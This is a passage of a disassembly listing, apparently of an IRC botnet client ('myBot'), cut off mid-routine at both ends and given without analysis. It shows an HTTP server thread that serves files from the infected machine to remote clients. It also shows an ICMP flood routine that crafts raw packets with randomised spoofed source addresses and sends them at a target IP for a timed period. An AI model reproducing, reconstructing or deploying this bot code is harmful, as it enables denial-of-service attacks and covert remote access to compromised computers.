mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404A3B
push 0
sub eax, esi
push eax
lea eax, [ebp+var_114]
push eax
push [ebp+var_4]
call dword_43589C ; send
push 40h
pop ecx
push 0
push ebx
lea eax, [ebp+var_114]
push eax
push [ebp+var_4]
xor esi, esi
lea edi, [ebp+var_114]
rep movsd
call dword_43577C ; recv
pop esi
pop ebx
loc_404A79: ; CODE XREF: sub_404999+65�j
push [ebp+var_4]
call dword_435914 ; closesocket
call dword_435920 ; WSACleanup
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_314]
push eax
call sub_414415
cmp [ebp+arg_C], 0
pop ecx
pop ecx
pop edi
jnz short locret_404ABE
push 0
push [ebp+arg_8]
lea eax, [ebp+var_314]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056BF
add esp, 14h
locret_404ABE: ; CODE XREF: sub_404999+109�j
leave
retn
sub_404999 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_404AC0 proc near ; DATA XREF: sub_404C2E+24E�o
var_1654 = byte ptr -1654h
var_654 = byte ptr -654h
var_550 = byte ptr -550h
var_44C = dword ptr -44Ch
var_3C8 = byte ptr -3C8h
var_2C4 = byte ptr -2C4h
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_A4 = dword ptr -0A4h
var_9C = byte ptr -9Ch
var_68 = byte ptr -68h
var_20 = byte ptr -20h
arg_0 = dword ptr 8
push ebp
mov eax, 1654h
lea ebp, [esp-74h]
call sub_414630
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
mov esi, eax
mov ecx, 0ECh
lea edi, [ebp+74h+var_44C]
rep movsd
mov dword ptr [eax+3ACh], 1
lea eax, [ebp+74h+var_3C8]
push eax
lea eax, [ebp+74h+var_550]
push eax
call sub_414415
lea eax, [ebp+74h+var_2C4]
push eax
lea eax, [ebp+74h+var_654]
push eax
call sub_414415
xor ebx, ebx
add esp, 10h
cmp [ebp+74h+var_A4], ebx
lea eax, [ebp+74h+var_9C]
jz short loc_404B28
push offset aTextHtml ; "text/html"
jmp short loc_404B2D
; ---------------------------------------------------------------------------
loc_404B28: ; CODE XREF: sub_404AC0+5F�j
push offset aApplicationOct ; "application/octet-stream"
loc_404B2D: ; CODE XREF: sub_404AC0+66�j
push eax
call sub_414415
pop ecx
pop ecx
push 46h
lea eax, [ebp+74h+var_68]
push eax
push offset aDddDdMmmYyyy ; "ddd, dd MMM yyyy"
push ebx
push ebx
mov esi, 409h
push esi
call ds:dword_42009C ; GetDateFormatA
push 1Eh
lea eax, [ebp+74h+var_20]
push eax
push offset aHhMmSs ; "HH:mm:ss"
push ebx
push ebx
push esi
call ds:dword_420098 ; GetTimeFormatA
cmp [ebp+74h+var_B8], 0FFFFFFFFh
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_68]
push eax
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_68]
push eax
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_68]
push eax
lea eax, [ebp+74h+var_9C]
jnz short loc_404B9A
push eax
lea eax, [ebp+74h+var_1654]
push offset aHttp1_0200OkSe ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax
call sub_414415
add esp, 24h
jmp short loc_404BB2
; ---------------------------------------------------------------------------
loc_404B9A: ; CODE XREF: sub_404AC0+C1�j
push [ebp+74h+var_B8]
push eax
lea eax, [ebp+74h+var_1654]
push offset aHttp1_0200Ok_0 ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax
call sub_414415
add esp, 28h
loc_404BB2: ; CODE XREF: sub_404AC0+D8�j
lea eax, [ebp+74h+var_1654]
lea edx, [eax+1]
loc_404BBB: ; CODE XREF: sub_404AC0+100�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_404BBB
push ebx
sub eax, edx
push eax
lea eax, [ebp+74h+var_1654]
push eax
push [ebp+74h+var_44C]
call dword_43589C ; send
cmp [ebp+74h+var_A4], ebx
jnz short loc_404BF4
lea eax, [ebp+74h+var_550]
push eax
push [ebp+74h+var_44C]
call sub_40489A
pop ecx
pop ecx
jmp short loc_404C11
; ---------------------------------------------------------------------------
loc_404BF4: ; CODE XREF: sub_404AC0+11C�j
lea eax, [ebp+74h+var_654]
push eax
push ebx
push [ebp+74h+var_44C]
lea eax, [ebp+74h+var_550]
push eax
call sub_4041A6
add esp, 10h
loc_404C11: ; CODE XREF: sub_404AC0+132�j
push [ebp+74h+var_44C]
call dword_435914 ; closesocket
push [ebp+74h+var_B4]
call sub_41255E
pop ecx
push ebx
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_404AC0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404C2E proc near ; CODE XREF: sub_404EE8+37C�p
var_8C4 = byte ptr -8C4h
var_6C4 = dword ptr -6C4h
var_640 = byte ptr -640h
var_53C = byte ptr -53Ch
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
var_314 = byte ptr -314h
var_211 = byte ptr -211h
var_210 = byte ptr -210h
var_10C = byte ptr -10Ch
var_10B = byte ptr -10Bh
var_10A = byte ptr -10Ah
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 8C4h
push ebx
push esi
push edi
push 41h
xor eax, eax
pop ecx
lea edi, [ebp+var_210]
rep stosd
mov eax, [ebp+arg_8]
xor esi, esi
cmp byte ptr [eax], 2Fh
mov [ebp+var_4], esi
push eax
jz short loc_404C5C
push offset aS_8 ; "\\%s"
jmp short loc_404C64
; ---------------------------------------------------------------------------
loc_404C5C: ; CODE XREF: sub_404C2E+25�j
mov byte ptr [eax], 5Ch
push offset aS_2 ; "%s"
loc_404C64: ; CODE XREF: sub_404C2E+2C�j
lea eax, [ebp+var_10C]
push eax
call sub_414415
lea eax, [ebp+var_10C]
add esp, 0Ch
xor edi, edi
lea ecx, [eax+1]
loc_404C7E: ; CODE XREF: sub_404C2E+55�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_404C7E
sub eax, ecx
mov [ebp+arg_8], eax
jz short loc_404D04
push 2
pop ebx
loc_404C8F: ; CODE XREF: sub_404C2E+D4�j
lea eax, [ebp+var_10C]
lea edx, [eax+1]
loc_404C98: ; CODE XREF: sub_404C2E+6F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404C98
sub eax, edx
cmp ebx, eax
jnb short loc_404CD1
cmp [ebp+esi+var_10C], 25h
jnz short loc_404CD1
cmp [ebp+esi+var_10B], 32h
jnz short loc_404CD1
cmp [ebp+esi+var_10A], 30h
jnz short loc_404CD1
inc esi
inc esi
inc ebx
mov [ebp+edi+var_210], 20h
inc ebx
jmp short loc_404CEB
; ---------------------------------------------------------------------------
loc_404CD1: ; CODE XREF: sub_404C2E+75�j
; sub_404C2E+7F�j ...
mov al, [ebp+esi+var_10C]
cmp al, 2Fh
jnz short loc_404CE1
push 5Ch
pop eax
jmp short loc_404CE4
; ---------------------------------------------------------------------------
loc_404CE1: ; CODE XREF: sub_404C2E+AC�j
movsx eax, al
loc_404CE4: ; CODE XREF: sub_404C2E+B1�j
mov [ebp+edi+var_210], al
loc_404CEB: ; CODE XREF: sub_404C2E+A1�j
inc esi
lea eax, [ebp+var_10C]
inc ebx
inc edi
lea ecx, [eax+1]
loc_404CF7: ; CODE XREF: sub_404C2E+CE�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_404CF7
sub eax, ecx
cmp esi, eax
jb short loc_404C8F
loc_404D04: ; CODE XREF: sub_404C2E+5C�j
lea eax, [ebp+var_210]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_314]
push offset aSS ; "%s%s"
push eax
call sub_414415
lea eax, [ebp+var_314]
push offset asc_4216D8 ; "\n"
push eax
call sub_415289
add esp, 18h
lea eax, [ebp+var_314]
push eax
call ds:dword_4200A0 ; GetFileAttributesA
xor ebx, ebx
inc ebx
cmp eax, 10h
jz short loc_404D55
cmp eax, 0FFFFFFFFh
jnz short loc_404D58
push [ebp+arg_0]
jmp loc_404DDD
; ---------------------------------------------------------------------------
loc_404D55: ; CODE XREF: sub_404C2E+118�j
mov [ebp+var_4], ebx
loc_404D58: ; CODE XREF: sub_404C2E+11D�j
cmp [ebp+edi+var_211], 5Ch
jnz short loc_404D65
mov [ebp+var_4], ebx
loc_404D65: ; CODE XREF: sub_404C2E+132�j
mov eax, [ebp+arg_0]
xor edi, edi
cmp [ebp+var_4], edi
mov [ebp+var_6C4], eax
mov [ebp+var_318], edi
jz short loc_404DE8
cmp [ebp+arg_C], edi
jz short loc_404DDC
lea edi, [ebp+var_314]
dec edi
loc_404D87: ; CODE XREF: sub_404C2E+15F�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_404D87
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_640]
mov esi, offset asc_421994 ; "*"
push eax
movsw
call sub_414415
lea eax, [ebp+var_210]
push eax
call sub_40495B
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+var_53C]
push eax
call sub_414415
or [ebp+var_330], 0FFFFFFFFh
add esp, 14h
mov [ebp+var_31C], ebx
xor edi, edi
jmp short loc_404E37
; ---------------------------------------------------------------------------
loc_404DDC: ; CODE XREF: sub_404C2E+150�j
push eax
loc_404DDD: ; CODE XREF: sub_404C2E+122�j
call dword_435914 ; closesocket
jmp loc_404ECF
; ---------------------------------------------------------------------------
loc_404DE8: ; CODE XREF: sub_404C2E+14B�j
push edi
push edi
push 3
push edi
push ebx
push 80000000h
lea eax, [ebp+var_314]
push eax
call ds:dword_420044 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_404E37
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_640]
push eax
call sub_414415
pop ecx
pop ecx
push edi
push esi
mov [ebp+var_31C], edi
call ds:dword_420094 ; GetFileSize
push esi
mov [ebp+var_330], eax
call ds:dword_42003C ; CloseHandle
loc_404E37: ; CODE XREF: sub_404C2E+1AC�j
; sub_404C2E+1D7�j
mov esi, [ebp+arg_10]
push esi
lea eax, [ebp+var_8C4]
push offset aHttpdWorkerThr ; "[HTTPD]: Worker thread of server thread"...
push eax
call sub_414415
push edi
lea eax, [ebp+var_8C4]
push 4
push eax
call sub_41229A
mov [ebp+var_32C], eax
imul eax, 234h
add esp, 18h
mov dword_4366A4[eax], esi
lea eax, [ebp+var_8]
push eax
push edi
lea eax, [ebp+var_6C4]
push eax
push offset sub_404AC0
push edi
push edi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_32C]
imul ecx, 234h
cmp eax, edi
mov dword_4366B4[ecx], eax
jnz short loc_404EDE
push [ebp+arg_0]
call dword_435914 ; closesocket
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_8C4]
push offset aHttpdFailedT_0 ; "[HTTPD]: Failed to start worker thread,"...
push eax
call sub_414415
lea eax, [ebp+var_8C4]
push eax
call sub_401EFF
add esp, 10h
loc_404ECF: ; CODE XREF: sub_404C2E+1B5�j
; sub_404C2E+2B8�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_404ED6: ; CODE XREF: sub_404C2E+2B6�j
push 5
call ds:dword_420000 ; Sleep
loc_404EDE: ; CODE XREF: sub_404C2E+26F�j
cmp [ebp+var_318], edi
jz short loc_404ED6
jmp short loc_404ECF
sub_404C2E endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_404EE8 proc near ; DATA XREF: sub_401141+363�o
; sub_4089DC+43DB�o
var_28F0 = byte ptr -28F0h
var_18F0 = byte ptr -18F0h
var_8F0 = byte ptr -8F0h
var_6F0 = dword ptr -6F0h
var_6EC = byte ptr -6ECh
var_464 = byte ptr -464h
var_360 = dword ptr -360h
var_358 = dword ptr -358h
var_354 = dword ptr -354h
var_350 = dword ptr -350h
var_34C = dword ptr -34Ch
var_340 = byte ptr -340h
var_23C = byte ptr -23Ch
var_138 = byte ptr -138h
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 28F0h
call sub_414630
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, eax
mov ecx, 0ECh
lea edi, [ebp+var_6F0]
rep movsd
push [ebp+var_360]
xor esi, esi
inc esi
mov [eax+3ACh], esi
xor eax, eax
lea edi, [ebp+var_24]
stosd
stosd
stosd
stosd
mov [ebp+var_14], esi
mov [ebp+var_24], 2
call dword_435954 ; htons
and [ebp+var_20], 0
push 0
push esi
push 2
mov [ebp+var_22], ax
call dword_435808 ; socket
mov ebx, eax
or edi, 0FFFFFFFFh
cmp ebx, edi
mov [ebp+var_8], ebx
jz loc_4052BB
mov eax, [ebp+var_358]
imul eax, 234h
mov dword_4366AC[eax], ebx
push 10h
lea eax, [ebp+var_24]
push eax
push ebx
call dword_4358E0 ; bind
cmp eax, edi
jz loc_4052BB
push 7FFFFFFFh
push ebx
call dword_435928 ; listen
cmp eax, edi
jz loc_4052BB
lea eax, [ebp+var_14]
push eax
push 8004667Eh
push ebx
call dword_4357AC ; ioctlsocket
cmp eax, edi
jz loc_4052BB
push 41h
xor eax, eax
pop ecx
push eax
push eax
push eax
lea eax, [ebp+var_23C]
push eax
mov [ebp+var_124], ebx
mov [ebp+var_128], esi
mov [ebp+var_4], ebx
lea eax, [ebx+1]
jmp loc_40529D
; ---------------------------------------------------------------------------
loc_404FCD: ; CODE XREF: sub_404EE8+3CD�j
xor esi, esi
mov [ebp+arg_0], esi
loc_404FD2: ; CODE XREF: sub_404EE8+39C�j
lea eax, [ebp+var_23C]
push eax
push esi
call dword_43585C ; __WSAFDIsSet
test eax, eax
jz loc_40527A
cmp esi, ebx
jnz short loc_40504F
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_138]
push eax
push ebx
mov [ebp+var_10], 10h
call dword_4357CC ; accept
cmp eax, 0FFFFFFFFh
jz loc_40527A
mov edx, [ebp+var_128]
xor ecx, ecx
test edx, edx
jbe short loc_405028
loc_40501A: ; CODE XREF: sub_404EE8+13E�j
cmp [ebp+ecx*4+var_124], eax
jz short loc_405028
inc ecx
cmp ecx, edx
jb short loc_40501A
loc_405028: ; CODE XREF: sub_404EE8+130�j
; sub_404EE8+139�j
cmp ecx, edx
jnz short loc_40503E
cmp edx, 40h
jnb short loc_40503E
mov [ebp+ecx*4+var_124], eax
inc [ebp+var_128]
loc_40503E: ; CODE XREF: sub_404EE8+142�j
; sub_404EE8+147�j
cmp eax, [ebp+var_4]
jbe loc_40527A
mov [ebp+var_4], eax
jmp loc_40527A
; ---------------------------------------------------------------------------
loc_40504F: ; CODE XREF: sub_404EE8+102�j
mov edx, 400h
xor eax, eax
mov ecx, edx
lea edi, [ebp+var_28F0]
rep stosd
push eax
mov ecx, edx
lea edi, [ebp+var_18F0]
rep stosd
push 1000h
lea eax, [ebp+var_28F0]
push eax
push esi
call dword_43577C ; recv
test eax, eax
jg short loc_4050D3
push esi
call dword_435914 ; closesocket
xor eax, eax
cmp [ebp+var_128], eax
jbe loc_40527A
loc_405097: ; CODE XREF: sub_404EE8+1BF�j
cmp [ebp+eax*4+var_124], esi
jz short loc_4050BD
inc eax
cmp eax, [ebp+var_128]
jb short loc_405097
jmp loc_40527A
; ---------------------------------------------------------------------------
loc_4050AE: ; CODE XREF: sub_404EE8+1DE�j
mov ecx, [ebp+eax*4+var_120]
mov [ebp+eax*4+var_124], ecx
inc eax
loc_4050BD: ; CODE XREF: sub_404EE8+1B6�j
mov ecx, [ebp+var_128]
dec ecx
cmp eax, ecx
jb short loc_4050AE
dec [ebp+var_128]
jmp loc_40527A
; ---------------------------------------------------------------------------
loc_4050D3: ; CODE XREF: sub_404EE8+198�j
push 41h
xor eax, eax
pop ecx
lea edi, [ebp+var_340]
rep stosd
lea eax, [ebp+var_28F0]
xor ebx, ebx
xor esi, esi
lea ecx, [eax+1]
loc_4050ED: ; CODE XREF: sub_404EE8+20A�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4050ED
sub eax, ecx
mov [ebp+var_C], eax
jz loc_405277
loc_4050FF: ; CODE XREF: sub_404EE8+2D0�j
mov al, [ebp+ebx+var_28F0]
cmp al, 0Ah
mov [ebp+esi+var_18F0], al
jnz loc_4051A2
mov esi, offset aGet ; "GET "
lea eax, [ebp+var_18F0]
push esi
push eax
call sub_414EE0
test eax, eax
pop ecx
pop ecx
jz short loc_40517C
lea eax, [ebp+var_18F0]
lea edx, [eax+1]
loc_405136: ; CODE XREF: sub_404EE8+253�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_405136
sub eax, edx
cmp eax, 5
jbe short loc_40517C
mov eax, offset asc_420AE8 ; " "
push eax
push eax
lea eax, [ebp+var_18F0]
push esi
push eax
call sub_414EE0
pop ecx
pop ecx
push eax
call sub_414EE0
pop ecx
pop ecx
push eax
call sub_415289
pop ecx
pop ecx
lea edx, [ebp+var_340]
loc_405170: ; CODE XREF: sub_404EE8+290�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_405170
jmp short loc_405190
; ---------------------------------------------------------------------------
loc_40517C: ; CODE XREF: sub_404EE8+243�j
; sub_404EE8+25A�j
push 3
mov edi, offset asc_4219D0 ; "\r\n"
lea esi, [ebp+var_18F0]
pop ecx
xor eax, eax
repe cmpsb
jz short loc_4051C3
loc_405190: ; CODE XREF: sub_404EE8+292�j
xor eax, eax
mov ecx, 400h
lea edi, [ebp+var_18F0]
rep stosd
or esi, 0FFFFFFFFh
loc_4051A2: ; CODE XREF: sub_404EE8+227�j
lea eax, [ebp+var_28F0]
inc ebx
inc esi
lea ecx, [eax+1]
loc_4051AD: ; CODE XREF: sub_404EE8+2CA�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4051AD
sub eax, ecx
cmp ebx, eax
jb loc_4050FF
jmp loc_405277
; ---------------------------------------------------------------------------
loc_4051C3: ; CODE XREF: sub_404EE8+2A6�j
mov ecx, [ebp+var_128]
xor eax, eax
test ecx, ecx
jbe short loc_405202
loc_4051CF: ; CODE XREF: sub_404EE8+2F6�j
mov edx, [ebp+eax*4+var_124]
cmp edx, [ebp+arg_0]
jz short loc_4051F7
inc eax
cmp eax, ecx
jb short loc_4051CF
jmp short loc_405202
; ---------------------------------------------------------------------------
loc_4051E2: ; CODE XREF: sub_404EE8+312�j
mov ecx, [ebp+eax*4+var_120]
mov [ebp+eax*4+var_124], ecx
mov ecx, [ebp+var_128]
inc eax
loc_4051F7: ; CODE XREF: sub_404EE8+2F1�j
dec ecx
cmp eax, ecx
jb short loc_4051E2
dec [ebp+var_128]
loc_405202: ; CODE XREF: sub_404EE8+2E5�j
; sub_404EE8+2F8�j
lea eax, [ebp+var_340]
lea edx, [eax+1]
loc_40520B: ; CODE XREF: sub_404EE8+328�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40520B
sub eax, edx
mov esi, eax
lea eax, [ebp+var_464]
lea ecx, [eax+1]
loc_40521F: ; CODE XREF: sub_404EE8+33C�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40521F
sub eax, ecx
add eax, esi
cmp eax, 104h
jnb short loc_40526E
and [ebp+var_C], 0
lea eax, [ebp+var_C]
push eax
push 8004667Eh
push [ebp+arg_0]
call dword_4357AC ; ioctlsocket
push [ebp+var_358]
lea eax, [ebp+var_340]
push [ebp+var_34C]
push eax
lea eax, [ebp+var_464]
push eax
push [ebp+arg_0]
call sub_404C2E
add esp, 14h
jmp short loc_405277
; ---------------------------------------------------------------------------
loc_40526E: ; CODE XREF: sub_404EE8+347�j
push [ebp+arg_0]
call dword_435914 ; closesocket
loc_405277: ; CODE XREF: sub_404EE8+211�j
; sub_404EE8+2D6�j ...
mov ebx, [ebp+var_8]
loc_40527A: ; CODE XREF: sub_404EE8+FA�j
; sub_404EE8+120�j ...
mov esi, [ebp+arg_0]
inc esi
cmp esi, [ebp+var_4]
mov [ebp+arg_0], esi
jbe loc_404FD2
push 41h
xor eax, eax
pop ecx
push eax
push eax
push eax
lea eax, [ebp+var_23C]
push eax
mov eax, [ebp+var_4]
inc eax
loc_40529D: ; CODE XREF: sub_404EE8+E0�j
lea esi, [ebp+var_128]
lea edi, [ebp+var_23C]
push eax
rep movsd
call dword_4358AC ; select
cmp eax, 0FFFFFFFFh
jnz loc_404FCD
loc_4052BB: ; CODE XREF: sub_404EE8+66�j
; sub_404EE8+8D�j ...
call dword_4358C0 ; WSAGetLastError
push eax
lea eax, [ebp+var_8F0]
push offset aHttpdErrorServ ; "[HTTPD]: Error: server failed, returned"...
push eax
call sub_414415
xor esi, esi
add esp, 0Ch
cmp [ebp+var_350], esi
jnz short loc_405303
push esi
push [ebp+var_354]
lea eax, [ebp+var_8F0]
push eax
lea eax, [ebp+var_6EC]
push eax
push [ebp+var_6F0]
call sub_4056BF
add esp, 14h
loc_405303: ; CODE XREF: sub_404EE8+3F6�j
lea eax, [ebp+var_8F0]
push eax
call sub_401EFF
pop ecx
push ebx
call dword_435914 ; closesocket
push [ebp+var_358]
call sub_41255E
pop ecx
push esi
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_404EE8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40532B proc near ; DATA XREF: sub_4089DC+2CEE�o
var_3BC = byte ptr -3BCh
var_1BC = dword ptr -1BCh
var_1B8 = byte ptr -1B8h
var_138 = byte ptr -138h
var_B8 = byte ptr -0B8h
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3BCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 68h
pop ecx
mov esi, eax
lea edi, [ebp+var_1BC]
rep movsd
push 0FFh
xor esi, esi
push 3
inc esi
push 2
mov [eax+19Ch], esi
call dword_435808 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_405392
call dword_4358C0 ; WSAGetLastError
push eax
lea eax, [ebp+var_3BC]
push offset aIcmpErrorSocke ; "[ICMP]: Error: socket() failed, returne"...
push eax
call sub_414415
add esp, 0Ch
xor esi, esi
loc_405384: ; CODE XREF: sub_40532B+9C�j
; sub_40532B+C3�j
cmp [ebp+var_24], esi
jnz loc_4055E6
jmp loc_4055C6
; ---------------------------------------------------------------------------
loc_405392: ; CODE XREF: sub_40532B+3A�j
push 4
lea ecx, [ebp+var_C]
push ecx
mov [ebp+var_C], esi
push 2
xor esi, esi
push esi
push eax
call dword_435824 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_4053C9
call dword_4358C0 ; WSAGetLastError
push eax
lea eax, [ebp+var_3BC]
push offset aIcmpErrorSetso ; "[ICMP]: Error: setsockopt() failed, ret"...
push eax
call sub_414415
add esp, 0Ch
jmp short loc_405384
; ---------------------------------------------------------------------------
loc_4053C9: ; CODE XREF: sub_40532B+7F�j
lea eax, [ebp+var_1B8]
push eax
call dword_43587C ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_4053F0
lea eax, [ebp+var_3BC]
push offset aIcmpInvalidTar ; "[ICMP]: Invalid target IP."
push eax
call sub_414415
pop ecx
pop ecx
jmp short loc_405384
; ---------------------------------------------------------------------------
loc_4053F0: ; CODE XREF: sub_40532B+AE�j
xor eax, eax
lea edi, [ebp+var_1C]
stosd
stosd
stosd
stosd
push esi
mov [ebp+var_1C], 2
call dword_435954 ; htons
mov [ebp+var_1A], ax
lea eax, [ebp+var_1B8]
push eax
call dword_43587C ; inet_addr
mov ebx, ds:dword_420004
mov [ebp+var_18], eax
mov [ebp+arg_0], esi
call ebx ; GetTickCount
mov [ebp+var_8], eax
call ebx ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_30]
ja loc_40557E
mov esi, 100h
loc_405444: ; CODE XREF: sub_40532B+24B�j
push 41Ch
mov byte_435360, 45h
call dword_435954 ; htons
mov word_435362, ax
xor eax, eax
cmp [ebp+var_2C], eax
mov word_435364, 1
mov word_435366, ax
mov byte_435368, 80h
mov byte_435369, 1
mov word_43536A, ax
jz short loc_4054B3
call sub_4145D1
mov edi, eax
shl edi, 8
call sub_4145D1
add edi, eax
shl edi, 8
call sub_4145D1
add edi, eax
shl edi, 8
call sub_4145D1
add edi, eax
mov dword_43536C, edi
jmp short loc_4054CB
; ---------------------------------------------------------------------------
loc_4054B3: ; CODE XREF: sub_40532B+159�j
push [ebp+var_1BC]
call sub_407D15
pop ecx
push eax
call dword_43587C ; inet_addr
mov dword_43536C, eax
loc_4054CB: ; CODE XREF: sub_40532B+186�j
mov eax, [ebp+var_18]
mov dword_435370, eax
call sub_4145D1
cdq
mov ecx, esi
idiv ecx
mov byte_435374, dl
call sub_4145D1
cdq
mov ecx, esi
idiv ecx
mov byte_435375, dl
call sub_4145D1
cdq
mov ecx, 0F0h
idiv ecx
and word_435376, 0
mov word_43537A, 1
inc edx
mov word_435378, dx
call sub_4145D1
cdq
mov ecx, 0FFh
idiv ecx
push 10h
mov edi, offset dword_43537C
mov al, dl
mov cl, al
mov ch, cl
mov eax, ecx
shl eax, 10h
mov ax, cx
mov ecx, esi
rep stosd
lea eax, [ebp+var_1C]
push eax
xor edi, edi
push edi
push 41Ch
push offset byte_435360
push [ebp+var_4]
call dword_4357D8 ; sendto
cmp eax, 0FFFFFFFFh
jz loc_405603
inc [ebp+arg_0]
call ebx ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_30]
jbe loc_405444
xor esi, esi
loc_40557E: ; CODE XREF: sub_40532B+10E�j
push [ebp+var_4]
call dword_435914 ; closesocket
mov eax, [ebp+arg_0]
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
xor edx, edx
div [ebp+var_30]
shr ecx, 14h
push ecx
push eax
push [ebp+arg_0]
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_138]
push eax
lea eax, [ebp+var_3BC]
push offset aIcmpDoneWithSF ; "[ICMP]: Done with %s flood to IP: %s. S"...
push eax
call sub_414415
add esp, 1Ch
cmp [ebp+var_24], esi
jnz short loc_4055E6
loc_4055C6: ; CODE XREF: sub_40532B+62�j
push esi
push [ebp+var_28]
lea eax, [ebp+var_3BC]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_4056BF
add esp, 14h
loc_4055E6: ; CODE XREF: sub_40532B+5C�j
; sub_40532B+299�j
lea eax, [ebp+var_3BC]
push eax
call sub_401EFF
push [ebp+var_38]
call sub_41255E
pop ecx
pop ecx
push esi
loc_4055FD: ; CODE XREF: sub_40532B+347�j
call ds:dword_420014 ; ExitThread
loc_405603: ; CODE XREF: sub_40532B+231�j
push [ebp+var_4]
call dword_435914 ; closesocket
call dword_4358C0 ; WSAGetLastError
push eax
push [ebp+arg_0]
lea eax, [ebp+var_1B8]
push eax
push offset aIcmpErrorSendi ; "[ICMP]: Error sending packets to IP: %s"...
lea eax, [ebp+var_3BC]
push 200h
push eax
call sub_41466D
add esp, 18h
cmp [ebp+var_24], edi
jnz short loc_40565B
push edi
push [ebp+var_28]
lea eax, [ebp+var_3BC]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_4056BF
add esp, 14h
loc_40565B: ; CODE XREF: sub_40532B+30E�j
lea eax, [ebp+var_3BC]
push eax
call sub_401EFF
push [ebp+var_38]
call sub_41255E
pop ecx
pop ecx
push edi
jmp short loc_4055FD
sub_40532B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405674 proc near ; CODE XREF: sub_408601+40�p
; sub_4089DC+1B8�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_200]
push 200h
push eax
call sub_4146C4
lea eax, [ebp+var_200]
add esp, 10h
lea edx, [eax+1]
loc_4056A1: ; CODE XREF: sub_405674+32�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4056A1
push 0
sub eax, edx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call dword_43589C ; send
leave
retn
sub_405674 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4056BF proc near ; CODE XREF: sub_401000+B2�p
; sub_4010CA:loc_40112B�p ...
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 400h
cmp [ebp+arg_C], 0
push esi
push edi
mov edi, offset aNotice ; "NOTICE"
jnz short loc_4056DA
